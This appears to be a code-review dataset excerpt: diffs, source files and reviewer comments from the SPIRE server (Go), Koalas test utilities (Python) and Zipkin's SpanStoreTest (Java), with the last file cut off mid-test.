if err := svidRotator.Initialize(ctx); err != nil {
return nil, err
}
return svidRotator, nil
}
func (s *Server) newEndpointsServer(ctx context.Context, catalog catalog.Catalog, svidObserver svid.Observer, serverCA ca.ServerCA, metrics telemetry.Metrics, caManager *ca.Manager) (endpoints.Server, error) {
config := endpoints.Config{
TCPAddr: s.config.BindAddress,
UDSAddr: s.config.BindUDSAddress,
SVIDObserver: svidObserver,
TrustDomain: s.config.TrustDomain,
Catalog: catalog,
ServerCA: serverCA,
Log: s.config.Log.WithField(telemetry.SubsystemName, telemetry.Endpoints),
Metrics: metrics,
Manager: caManager,
RateLimit: s.config.RateLimit,
Uptime: uptime.Uptime,
Clock: clock.New(),
CacheReloadInterval: s.config.CacheReloadInterval,
}
if s.config.Federation.BundleEndpoint != nil {
config.BundleEndpoint.Address = s.config.Federation.BundleEndpoint.Address
config.BundleEndpoint.ACME = s.config.Federation.BundleEndpoint.ACME
}
return endpoints.New(ctx, config)
}
func (s *Server) newBundleManager(cat catalog.Catalog, metrics telemetry.Metrics) *bundle_client.Manager {
return bundle_client.NewManager(bundle_client.ManagerConfig{
Log: s.config.Log.WithField(telemetry.SubsystemName, "bundle_client"),
Metrics: metrics,
DataStore: cat.GetDataStore(),
TrustDomains: s.config.Federation.FederatesWith,
})
}
func (s *Server) validateTrustDomain(ctx context.Context, ds datastore.DataStore) error {
trustDomain := s.config.TrustDomain.String()
// Get only first page with a single element
fetchResponse, err := ds.ListRegistrationEntries(ctx, &datastore.ListRegistrationEntriesRequest{
Pagination: &datastore.Pagination{
Token: "",
PageSize: pageSize,
}})
if err != nil {
return err
}
for _, entry := range fetchResponse.Entries {
id, err := url.Parse(entry.SpiffeId)
if err != nil {
return fmt.Errorf(invalidSpiffeIDRegistrationEntry, entry.EntryId, err)
}
if id.Host != trustDomain {
return fmt.Errorf(invalidTrustDomainRegistrationEntry, id.Host, trustDomain)
}
}
// Get only first page with a single element
nodesResponse, err := ds.ListAttestedNodes(ctx, &datastore.ListAttestedNodesRequest{
Pagination: &datastore.Pagination{
Token: "",
PageSize: pageSize,
}})
if err != nil {
return err
}
for _, node := range nodesResponse.Nodes {
id, err := url.Parse(node.SpiffeId)
if err != nil {
s.config.Log.WithError(err).WithField(telemetry.SPIFFEID, node.SpiffeId).Warn(invalidSpiffeIDAttestedNode)
continue
}
if id.Host != trustDomain {
msg := fmt.Sprintf(invalidTrustDomainAttestedNode, id.Host, trustDomain)
s.config.Log.Warn(msg)
}
}
return nil
}
// waitForTestDial calls health.WaitForTestDial to wait for a connection to the
// SPIRE Server API socket. This function always returns nil, even if
// health.WaitForTestDial exited due to a timeout.
func (s *Server) waitForTestDial(ctx context.Context) error {
health.WaitForTestDial(ctx, s.config.BindUDSAddress)
return nil
}
// CheckHealth is used as a top-level health check for the Server.
func (s *Server) CheckHealth() health.State {
err := s.tryGetBundle()
// The API is served only after the server CA has been
// signed by upstream. Hence, both live and ready checks
// are determined by whether the bundles are received or not.
// TODO: Better live check for server.
return health.State{
Ready: err == nil,
Live: err == nil,
ReadyDetails: serverHealthDetails{
GetBundleErr: errString(err),
},
LiveDetails: serverHealthDetails{
GetBundleErr: errString(err),
},
}
}
func (s *Server) tryGetBundle() error {
client, err := server_util.NewServerClient(s.config.BindUDSAddress.Name)
if err != nil {
return errors.New("cannot create registration client")
}
defer client.Release()
bundleClient := client.NewBundleClient()
// Currently using the ability to fetch a bundle as the health check. This
// **could** be problematic if the Upstream CA signing process is lengthy.
// As currently coded however, the API isn't served until after
// the server CA has been signed by upstream.
if _, err := bundleClient.GetBundle(context.Background(), &bundlev1.GetBundleRequest{}); err != nil {
return errors.New("unable to fetch bundle")
}
return nil
}
type serverHealthDetails struct {
GetBundleErr string `json:"get_bundle_err,omitempty"`
}
func errString(err error) string {
if err != nil {
return err.Error()
}
return ""
}
| 1 | 16,511 | This is also used to log, of which our convention is leading uppercase... | spiffe-spire | go |
@@ -131,7 +131,7 @@ class ReusedSQLTestCase(unittest.TestCase, SQLTestUtils):
# Please see databricks/koalas/conftest.py.
pass
- def assertPandasEqual(self, left, right):
+ def assertPandasEqual(self, left, right, less_precise=False):
if isinstance(left, pd.DataFrame) and isinstance(right, pd.DataFrame):
try:
pd.util.testing.assert_frame_equal( | 1 | #
# Copyright (C) 2019 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
import shutil
import tempfile
import unittest
import warnings
from contextlib import contextmanager
import pandas as pd
from databricks import koalas as ks
from databricks.koalas.frame import DataFrame
from databricks.koalas.indexes import Index
from databricks.koalas.series import Series
from databricks.koalas.utils import name_like_string, default_session
class SQLTestUtils(object):
"""
This util assumes the instance of this to have 'spark' attribute, having a spark session.
It is usually used with 'ReusedSQLTestCase' class but can be used if you feel sure the
the implementation of this class has 'spark' attribute.
"""
@contextmanager
def sql_conf(self, pairs):
"""
A convenient context manager to test some configuration specific logic. This sets
`value` to the configuration `key` and then restores it back when it exits.
"""
assert isinstance(pairs, dict), "pairs should be a dictionary."
assert hasattr(self, "spark"), "it should have 'spark' attribute, having a spark session."
keys = pairs.keys()
new_values = pairs.values()
old_values = [self.spark.conf.get(key, None) for key in keys]
for key, new_value in zip(keys, new_values):
self.spark.conf.set(key, new_value)
try:
yield
finally:
for key, old_value in zip(keys, old_values):
if old_value is None:
self.spark.conf.unset(key)
else:
self.spark.conf.set(key, old_value)
@contextmanager
def database(self, *databases):
"""
A convenient context manager to test with some specific databases. This drops the given
databases if it exists and sets current database to "default" when it exits.
"""
assert hasattr(self, "spark"), "it should have 'spark' attribute, having a spark session."
try:
yield
finally:
for db in databases:
self.spark.sql("DROP DATABASE IF EXISTS %s CASCADE" % db)
self.spark.catalog.setCurrentDatabase("default")
@contextmanager
def table(self, *tables):
"""
A convenient context manager to test with some specific tables. This drops the given tables
if it exists.
"""
assert hasattr(self, "spark"), "it should have 'spark' attribute, having a spark session."
try:
yield
finally:
for t in tables:
self.spark.sql("DROP TABLE IF EXISTS %s" % t)
@contextmanager
def tempView(self, *views):
"""
A convenient context manager to test with some specific views. This drops the given views
if it exists.
"""
assert hasattr(self, "spark"), "it should have 'spark' attribute, having a spark session."
try:
yield
finally:
for v in views:
self.spark.catalog.dropTempView(v)
@contextmanager
def function(self, *functions):
"""
A convenient context manager to test with some specific functions. This drops the given
functions if it exists.
"""
assert hasattr(self, "spark"), "it should have 'spark' attribute, having a spark session."
try:
yield
finally:
for f in functions:
self.spark.sql("DROP FUNCTION IF EXISTS %s" % f)
class ReusedSQLTestCase(unittest.TestCase, SQLTestUtils):
@classmethod
def setUpClass(cls):
cls.spark = default_session()
cls.spark.conf.set("spark.sql.execution.arrow.enabled", True)
@classmethod
def tearDownClass(cls):
# We don't stop Spark session to reuse across all tests.
# The Spark session will be started and stopped at PyTest session level.
# Please see databricks/koalas/conftest.py.
pass
def assertPandasEqual(self, left, right):
if isinstance(left, pd.DataFrame) and isinstance(right, pd.DataFrame):
try:
pd.util.testing.assert_frame_equal(
left,
right,
check_index_type=("equiv" if len(left.index) > 0 else False),
check_column_type=("equiv" if len(left.columns) > 0 else False),
check_exact=True,
)
except AssertionError as e:
msg = (
str(e)
+ "\n\nLeft:\n%s\n%s" % (left, left.dtypes)
+ "\n\nRight:\n%s\n%s" % (right, right.dtypes)
)
raise AssertionError(msg) from e
elif isinstance(left, pd.Series) and isinstance(right, pd.Series):
try:
pd.util.testing.assert_series_equal(
left,
right,
check_index_type=("equiv" if len(left.index) > 0 else False),
check_exact=True,
)
except AssertionError as e:
msg = (
str(e)
+ "\n\nLeft:\n%s\n%s" % (left, left.dtype)
+ "\n\nRight:\n%s\n%s" % (right, right.dtype)
)
raise AssertionError(msg) from e
elif isinstance(left, pd.Index) and isinstance(right, pd.Index):
try:
pd.util.testing.assert_index_equal(left, right, check_exact=True)
except AssertionError as e:
msg = (
str(e)
+ "\n\nLeft:\n%s\n%s" % (left, left.dtype)
+ "\n\nRight:\n%s\n%s" % (right, right.dtype)
)
raise AssertionError(msg) from e
else:
raise ValueError("Unexpected values: (%s, %s)" % (left, right))
def assertPandasAlmostEqual(self, left, right):
"""
This function checks if given pandas objects approximately same,
which means the conditions below:
- Both objects are nullable
- Compare floats rounding to the number of decimal places, 7 after
dropping missing values (NaN, NaT, None)
"""
if isinstance(left, pd.DataFrame) and isinstance(right, pd.DataFrame):
msg = (
"DataFrames are not almost equal: "
+ "\n\nLeft:\n%s\n%s" % (left, left.dtypes)
+ "\n\nRight:\n%s\n%s" % (right, right.dtypes)
)
self.assertEqual(left.shape, right.shape, msg=msg)
for lcol, rcol in zip(left.columns, right.columns):
self.assertEqual(name_like_string(lcol), name_like_string(rcol), msg=msg)
for lnull, rnull in zip(left[lcol].isnull(), right[rcol].isnull()):
self.assertEqual(lnull, rnull, msg=msg)
for lval, rval in zip(left[lcol].dropna(), right[rcol].dropna()):
self.assertAlmostEqual(lval, rval, msg=msg)
elif isinstance(left, pd.Series) and isinstance(left, pd.Series):
msg = (
"Series are not almost equal: "
+ "\n\nLeft:\n%s\n%s" % (left, left.dtype)
+ "\n\nRight:\n%s\n%s" % (right, right.dtype)
)
self.assertEqual(str(left.name), str(right.name), msg=msg)
self.assertEqual(len(left), len(right), msg=msg)
for lnull, rnull in zip(left.isnull(), right.isnull()):
self.assertEqual(lnull, rnull, msg=msg)
for lval, rval in zip(left.dropna(), right.dropna()):
self.assertAlmostEqual(lval, rval, msg=msg)
elif isinstance(left, pd.MultiIndex) and isinstance(left, pd.MultiIndex):
msg = (
"MultiIndices are not almost equal: "
+ "\n\nLeft:\n%s\n%s" % (left, left.dtype)
+ "\n\nRight:\n%s\n%s" % (right, right.dtype)
)
self.assertEqual(len(left), len(right), msg=msg)
for lval, rval in zip(left, right):
self.assertAlmostEqual(lval, rval, msg=msg)
elif isinstance(left, pd.Index) and isinstance(left, pd.Index):
msg = (
"Indices are not almost equal: "
+ "\n\nLeft:\n%s\n%s" % (left, left.dtype)
+ "\n\nRight:\n%s\n%s" % (right, right.dtype)
)
self.assertEqual(len(left), len(right), msg=msg)
for lnull, rnull in zip(left.isnull(), right.isnull()):
self.assertEqual(lnull, rnull, msg=msg)
for lval, rval in zip(left.dropna(), right.dropna()):
self.assertAlmostEqual(lval, rval, msg=msg)
else:
raise ValueError("Unexpected values: (%s, %s)" % (left, right))
def assert_eq(self, left, right, almost=False):
"""
Asserts if two arbitrary objects are equal or not. If given objects are Koalas DataFrame
or Series, they are converted into pandas' and compared.
:param left: object to compare
:param right: object to compare
:param almost: if this is enabled, the comparison is delegated to `unittest`'s
`assertAlmostEqual`. See its documentation for more details.
"""
lpdf = self._to_pandas(left)
rpdf = self._to_pandas(right)
if isinstance(lpdf, (pd.DataFrame, pd.Series, pd.Index)):
if almost:
self.assertPandasAlmostEqual(lpdf, rpdf)
else:
self.assertPandasEqual(lpdf, rpdf)
else:
if almost:
self.assertAlmostEqual(lpdf, rpdf)
else:
self.assertEqual(lpdf, rpdf)
def assert_array_eq(self, left, right):
self.assertTrue((left == right).all())
def assert_list_eq(self, left, right):
for litem, ritem in zip(left, right):
self.assert_eq(litem, ritem)
@staticmethod
def _to_pandas(df):
if isinstance(df, (DataFrame, Series, Index)):
return df.toPandas()
else:
return df
class TestUtils(object):
@contextmanager
def temp_dir(self):
tmp = tempfile.mkdtemp()
try:
yield tmp
finally:
shutil.rmtree(tmp)
@contextmanager
def temp_file(self):
with self.temp_dir() as tmp:
yield tempfile.mktemp(dir=tmp)
class ComparisonTestBase(ReusedSQLTestCase):
@property
def kdf(self):
return ks.from_pandas(self.pdf)
@property
def pdf(self):
return self.kdf.toPandas()
def compare_both(f=None, almost=True):
if f is None:
return functools.partial(compare_both, almost=almost)
elif isinstance(f, bool):
return functools.partial(compare_both, almost=f)
@functools.wraps(f)
def wrapped(self):
if almost:
compare = self.assertPandasAlmostEqual
else:
compare = self.assertPandasEqual
for result_pandas, result_spark in zip(f(self, self.pdf), f(self, self.kdf)):
compare(result_pandas, result_spark.toPandas())
return wrapped
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Notes
-----
Replicated from pandas._testing.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False): # doctest: +SKIP
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning): # doctest: +SKIP
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(actual_warning.category, expected_warning):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. ",
"File where warning is raised: {} != ".format(actual_warning.filename),
"{}. Warning message: {}".format(caller.filename, actual_warning.message),
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = "Did not see expected warning of class {}".format(repr(expected_warning.__name__))
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError("Caused unexpected warning(s): {}".format(repr(extra_warnings)))
| 1 | 16,065 | What about we just name it `check_exact`? | databricks-koalas | py |
@@ -205,9 +205,10 @@ public abstract class SpanStoreTest {
}
@Test
- public void getAllServiceNames() {
+ public void getAllServiceNames_mergesAnnotation_andBinaryAnnotation() {
+ // creates a span with mutual exclusive endpoints in binary annotations and annotations
BinaryAnnotation yak = BinaryAnnotation.address("sa", Endpoint.create("yak", 127 << 24 | 1));
- accept(span1.toBuilder().addBinaryAnnotation(yak).build(), span4);
+ accept(span1.toBuilder().binaryAnnotations(asList(yak)).build());
// should be in order
assertThat(store().getServiceNames()).containsExactly("service", "yak"); | 1 | /**
* Copyright 2015-2016 The OpenZipkin Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package zipkin.storage;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Calendar;
import java.util.Collections;
import java.util.GregorianCalendar;
import java.util.List;
import java.util.SortedSet;
import java.util.TimeZone;
import java.util.TreeSet;
import java.util.stream.Collectors;
import java.util.stream.IntStream;
import org.junit.Before;
import org.junit.Test;
import zipkin.Annotation;
import zipkin.BinaryAnnotation;
import zipkin.Endpoint;
import zipkin.Span;
import zipkin.TestObjects;
import zipkin.internal.CallbackCaptor;
import static java.util.Arrays.asList;
import static java.util.Collections.emptyList;
import static java.util.stream.Collectors.toList;
import static org.assertj.core.api.Assertions.assertThat;
import static zipkin.Constants.CLIENT_RECV;
import static zipkin.Constants.CLIENT_SEND;
import static zipkin.Constants.LOCAL_COMPONENT;
import static zipkin.Constants.SERVER_RECV;
import static zipkin.Constants.SERVER_SEND;
import static zipkin.TestObjects.APP_ENDPOINT;
import static zipkin.TestObjects.WEB_ENDPOINT;
/**
* Base test for {@link SpanStore} implementations. Subtypes should create a connection to a real
* backend, even if that backend is in-process.
*
* <p>This is a replacement for {@code com.twitter.zipkin.storage.SpanStoreSpec}.
*/
public abstract class SpanStoreTest {
/** Should maintain state between multiple calls within a test. */
protected abstract StorageComponent storage();
protected SpanStore store() {
return storage().spanStore();
}
/** Blocks until the callback completes to allow read-your-writes consistency during tests. */
protected void accept(Span... spans) {
CallbackCaptor<Void> captor = new CallbackCaptor<>();
storage().asyncSpanConsumer().accept(asList(spans), captor);
captor.get(); // block on result
}
/** Clears store between tests. */
@Before
public abstract void clear() throws IOException;
/** Notably, the cassandra implementation has day granularity */
static long midnight(){
Calendar date = new GregorianCalendar(TimeZone.getTimeZone("GMT"));
// reset hour, minutes, seconds and millis
date.set(Calendar.HOUR_OF_DAY, 0);
date.set(Calendar.MINUTE, 0);
date.set(Calendar.SECOND, 0);
date.set(Calendar.MILLISECOND, 0);
return date.getTimeInMillis();
}
// Use real time, as most span-stores have TTL logic which looks back several days.
long today = midnight();
Endpoint ep = Endpoint.create("service", 127 << 24 | 1);
long spanId = 456;
Annotation ann1 = Annotation.create((today + 1) * 1000, "cs", ep);
Annotation ann2 = Annotation.create((today + 2) * 1000, "sr", null);
Annotation ann3 = Annotation.create((today + 10) * 1000, "custom", ep);
Annotation ann4 = Annotation.create((today + 20) * 1000, "custom", ep);
Annotation ann5 = Annotation.create((today + 5) * 1000, "custom", ep);
Annotation ann6 = Annotation.create((today + 6) * 1000, "custom", ep);
Annotation ann7 = Annotation.create((today + 7) * 1000, "custom", ep);
Annotation ann8 = Annotation.create((today + 8) * 1000, "custom", ep);
Span span1 = Span.builder()
.traceId(123)
.name("methodcall")
.id(spanId)
.timestamp(ann1.timestamp).duration(9000L)
.annotations(asList(ann1, ann3))
.addBinaryAnnotation(BinaryAnnotation.create("BAH", "BEH", ep)).build();
Span span2 = Span.builder()
.traceId(456)
.name("methodcall")
.id(spanId)
.timestamp(ann2.timestamp)
.addAnnotation(ann2)
.addBinaryAnnotation(BinaryAnnotation.create("BAH2", "BEH2", ep)).build();
Span span3 = Span.builder()
.traceId(789)
.name("methodcall")
.id(spanId)
.timestamp(ann2.timestamp).duration(18000L)
.annotations(asList(ann2, ann3, ann4))
.addBinaryAnnotation(BinaryAnnotation.create("BAH2", "BEH2", ep)).build();
Span span4 = Span.builder()
.traceId(999)
.name("methodcall")
.id(spanId)
.timestamp(ann6.timestamp).duration(1000L)
.annotations(asList(ann6, ann7)).build();
Span span5 = Span.builder()
.traceId(999)
.name("methodcall")
.id(spanId)
.timestamp(ann5.timestamp).duration(3000L)
.annotations(asList(ann5, ann8))
.addBinaryAnnotation(BinaryAnnotation.create("BAH2", "BEH2", ep)).build();
Span spanEmptySpanName = Span.builder()
.traceId(123)
.name("")
.id(spanId)
.parentId(1L)
.timestamp(ann1.timestamp).duration(1000L)
.annotations(asList(ann1, ann2)).build();
Span spanEmptyServiceName = Span.builder()
.traceId(123)
.name("spanname")
.id(spanId).build();
@Test
public void getTrace() {
accept(span1, span2);
assertThat(store().getTrace(span1.traceId)).isEqualTo(asList(span1));
}
@Test
public void getTrace_nullWhenNotFound() {
assertThat(store().getTrace(111111L)).isNull();
}
/**
* Filtered traces are returned in reverse insertion order. This is because the primary search
* interface is a timeline view, looking back from an end timestamp.
*/
@Test
public void tracesRetrieveInOrderDesc() {
accept(span2, span1.toBuilder().annotations(asList(ann3, ann1)).build());
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").build()))
.containsOnly(asList(span2), asList(span1));
}
/** Legacy instrumentation will not set timestamp and duration explicitly */
@Test
public void derivesTimestampAndDurationFromAnnotations() {
accept(span1.toBuilder().timestamp(null).duration(null).build());
assertThat(store().getTrace(span1.traceId))
.containsOnly(span1);
}
@Test
public void getSpanNames() {
accept(span1.toBuilder().name("yak").build(), span4);
// should be in order
assertThat(store().getSpanNames("service")).containsExactly("methodcall", "yak");
}
@Test
public void getSpanNames_allReturned() {
// Assure a default spanstore limit isn't hit by assuming if 50 are returned, all are returned
List<String> spanNames = new ArrayList<>();
for (int i = 0; i < 50; i++) {
String suffix = i < 10 ? "0" + i : String.valueOf(i);
accept(span1.toBuilder().id(i).name("yak" + suffix).build());
spanNames.add("yak" + suffix);
}
// should be in order
assertThat(store().getSpanNames("service")).containsOnlyElementsOf(spanNames);
}
@Test
public void getAllServiceNames() {
BinaryAnnotation yak = BinaryAnnotation.address("sa", Endpoint.create("yak", 127 << 24 | 1));
accept(span1.toBuilder().addBinaryAnnotation(yak).build(), span4);
// should be in order
assertThat(store().getServiceNames()).containsExactly("service", "yak");
}
@Test
public void getAllServiceNames__allReturned() {
// Assure a default spanstore limit isn't hit by assuming if 50 are returned, all are returned
List<String> serviceNames = new ArrayList<>();
serviceNames.add("service");
for (int i = 0; i < 50; i++) {
String suffix = i < 10 ? "0" + i : String.valueOf(i);
BinaryAnnotation yak =
BinaryAnnotation.address("sa", Endpoint.create("yak" + suffix, 127 << 24 | 1));
accept(span1.toBuilder().id(i).addBinaryAnnotation(yak).build());
serviceNames.add("yak" + suffix);
}
assertThat(store().getServiceNames()).containsOnlyElementsOf(serviceNames);
}
/**
* This would only happen when the store layer is bootstrapping, or has been purged.
*/
@Test
public void allShouldWorkWhenEmpty() {
QueryRequest.Builder q = QueryRequest.builder().serviceName("service");
assertThat(store().getTraces(q.build())).isEmpty();
assertThat(store().getTraces(q.spanName("methodcall").build())).isEmpty();
assertThat(store().getTraces(q.addAnnotation("custom").build())).isEmpty();
assertThat(store().getTraces(q.addBinaryAnnotation("BAH", "BEH").build())).isEmpty();
}
/**
* This is unlikely and means instrumentation sends empty spans by mistake.
*/
@Test
public void allShouldWorkWhenNoAnnotationsYet() {
accept(spanEmptyServiceName);
QueryRequest.Builder q = QueryRequest.builder().serviceName("service");
assertThat(store().getTraces(q.build())).isEmpty();
assertThat(store().getTraces(q.spanName("methodcall").build())).isEmpty();
assertThat(store().getTraces(q.addAnnotation("custom").build())).isEmpty();
assertThat(store().getTraces(q.addBinaryAnnotation("BAH", "BEH").build())).isEmpty();
}
@Test
public void getTraces_spanName() {
accept(span1);
QueryRequest.Builder q = QueryRequest.builder().serviceName("service");
assertThat(store().getTraces(q.build()))
.containsExactly(asList(span1));
assertThat(store().getTraces(q.spanName("methodcall").build()))
.containsExactly(asList(span1));
assertThat(store().getTraces(q.spanName("badmethod").build())).isEmpty();
assertThat(store().getTraces(q.serviceName("badservice").build())).isEmpty();
assertThat(store().getTraces(q.spanName(null).build())).isEmpty();
}
@Test
public void getTraces_serviceNameInBinaryAnnotation() {
Span localTrace = Span.builder().traceId(1L).name("targz").id(1L)
.timestamp(today * 1000 + 100L).duration(200L)
.addBinaryAnnotation(BinaryAnnotation.create(LOCAL_COMPONENT, "archiver", ep)).build();
accept(localTrace);
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").build()))
.containsExactly(asList(localTrace));
}
/**
* Formerly, a bug was present where cassandra didn't index more than bucket count traces per
* millisecond. This stores a lot of spans to ensure indexes work under high-traffic scenarios.
*/
@Test
public void getTraces_manyTraces() {
int traceCount = 1000;
Span span = TestObjects.LOTS_OF_SPANS[0];
BinaryAnnotation b = span.binaryAnnotations.get(0);
accept(Arrays.copyOfRange(TestObjects.LOTS_OF_SPANS, 0, traceCount));
assertThat(store().getTraces(new QueryRequest.Builder().limit(traceCount).build()))
.hasSize(traceCount);
QueryRequest.Builder builder =
QueryRequest.builder().limit(traceCount).serviceName(b.endpoint.serviceName);
assertThat(store().getTraces(builder.build()))
.hasSize(traceCount);
assertThat(store().getTraces(builder.spanName(span.name).build()))
.hasSize(traceCount);
assertThat(store().getTraces(builder.addBinaryAnnotation(b.key, new String(b.value)).build()))
.hasSize(traceCount);
}
/** Shows that duration queries go against the root span, not the child */
@Test
public void getTraces_duration() {
Endpoint service1 = Endpoint.create("service1", 127 << 24 | 1);
Endpoint service2 = Endpoint.create("service2", 127 << 24 | 2);
Endpoint service3 = Endpoint.create("service3", 127 << 24 | 3);
BinaryAnnotation.Builder component = BinaryAnnotation.builder().key(LOCAL_COMPONENT).value("archiver");
BinaryAnnotation archiver1 = component.endpoint(service1).build();
BinaryAnnotation archiver2 = component.endpoint(service2).build();
BinaryAnnotation archiver3 = component.endpoint(service3).build();
Span targz = Span.builder().traceId(1L).id(1L)
.name("targz").timestamp(today * 1000 + 100L).duration(200L).addBinaryAnnotation(archiver1).build();
Span tar = Span.builder().traceId(1L).id(2L).parentId(1L)
.name("tar").timestamp(today * 1000 + 200L).duration(150L).addBinaryAnnotation(archiver2).build();
Span gz = Span.builder().traceId(1L).id(3L).parentId(1L)
.name("gz").timestamp(today * 1000 + 250L).duration(50L).addBinaryAnnotation(archiver3).build();
Span zip = Span.builder().traceId(3L).id(3L)
.name("zip").timestamp(today * 1000 + 130L).duration(50L).addBinaryAnnotation(archiver2).build();
List<Span> trace1 = asList(targz, tar, gz);
List<Span> trace2 = asList(
targz.toBuilder().traceId(2L).timestamp(today * 1000 + 110L).binaryAnnotations(asList(archiver3)).build(),
tar.toBuilder().traceId(2L).timestamp(today * 1000 + 210L).binaryAnnotations(asList(archiver2)).build(),
gz.toBuilder().traceId(2L).timestamp(today * 1000 + 260L).binaryAnnotations(asList(archiver1)).build());
List<Span> trace3 = asList(zip);
accept(trace1.toArray(new Span[0]));
accept(trace2.toArray(new Span[0]));
accept(trace3.toArray(new Span[0]));
long lookback = 12L * 60 * 60 * 1000; // 12hrs, instead of 7days
long endTs = today + 1; // greater than all timestamps above
QueryRequest.Builder q = QueryRequest.builder().serviceName("service1").lookback(lookback).endTs(endTs);
// Min duration is inclusive and is applied by service.
assertThat(store().getTraces(q.serviceName("service1").minDuration(targz.duration).build()))
.containsExactly(trace1);
assertThat(store().getTraces(q.serviceName("service3").minDuration(targz.duration).build()))
.containsExactly(trace2);
// Duration bounds aren't limited to root spans: they apply to all spans by service in a trace
assertThat(store().getTraces(q.serviceName("service2").minDuration(zip.duration).maxDuration(tar.duration).build()))
.containsExactly(trace3, trace2, trace1); // service2 is in the middle of trace1 and 2, but root of trace3
// Span name should apply to the duration filter
assertThat(
store().getTraces(q.serviceName("service2").spanName("zip").maxDuration(zip.duration).build()))
.containsExactly(trace3);
// Max duration should filter our longer spans from the same service
assertThat(store().getTraces(q.serviceName("service2").minDuration(gz.duration).maxDuration(zip.duration).build()))
.containsExactly(trace3);
}
/**
* Spans and traces are meaningless unless they have a timestamp. While unlikley, this could
* happen if a binary annotation is logged before a timestamped one is.
*/
@Test
public void getTraces_absentWhenNoTimestamp() {
// store the binary annotations
accept(span1.toBuilder().timestamp(null).duration(null).annotations(emptyList()).build());
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").build())).isEmpty();
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").serviceName("methodcall").build())).isEmpty();
// now store the timestamped annotations
accept(span1.toBuilder().binaryAnnotations(emptyList()).build());
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").build()))
.containsExactly(asList(span1));
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").spanName("methodcall").build()))
.containsExactly(asList(span1));
}
@Test
public void getTraces_annotation() {
accept(span1);
// fetch by time based annotation, find trace
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").addAnnotation("custom").build()))
.containsExactly(asList(span1));
// should find traces by the key and value annotation
assertThat(
store().getTraces(QueryRequest.builder().serviceName("service").addBinaryAnnotation("BAH", "BEH").build()))
.containsExactly(asList(span1));
}
@Test
public void getTraces_multipleAnnotationsBecomeAndFilter() {
Span foo = Span.builder().traceId(1).name("call1").id(1)
.timestamp((today + 1) * 1000)
.addAnnotation(Annotation.create((today + 1) * 1000, "foo", ep)).build();
// would be foo bar, except lexicographically bar precedes foo
Span barAndFoo = Span.builder().traceId(2).name("call2").id(2)
.timestamp((today + 2) * 1000)
.addAnnotation(Annotation.create((today + 2) * 1000, "bar", ep))
.addAnnotation(Annotation.create((today + 2) * 1000, "foo", ep)).build();
Span fooAndBazAndQux = Span.builder().traceId(3).name("call3").id(3)
.timestamp((today + 3) * 1000)
.addAnnotation(Annotation.create((today + 3) * 1000, "foo", ep))
.addBinaryAnnotation(BinaryAnnotation.create("baz", "qux", ep))
.build();
Span barAndFooAndBazAndQux = Span.builder().traceId(4).name("call4").id(4)
.timestamp((today + 4) * 1000)
.addAnnotation(Annotation.create((today + 4) * 1000, "bar", ep))
.addAnnotation(Annotation.create((today + 4) * 1000, "foo", ep))
.addBinaryAnnotation(BinaryAnnotation.create("baz", "qux", ep))
.build();
accept(foo, barAndFoo, fooAndBazAndQux, barAndFooAndBazAndQux);
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").addAnnotation("foo").build()))
.containsExactly(asList(barAndFooAndBazAndQux), asList(fooAndBazAndQux), asList(barAndFoo), asList(foo));
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").addAnnotation("foo").addAnnotation("bar").build()))
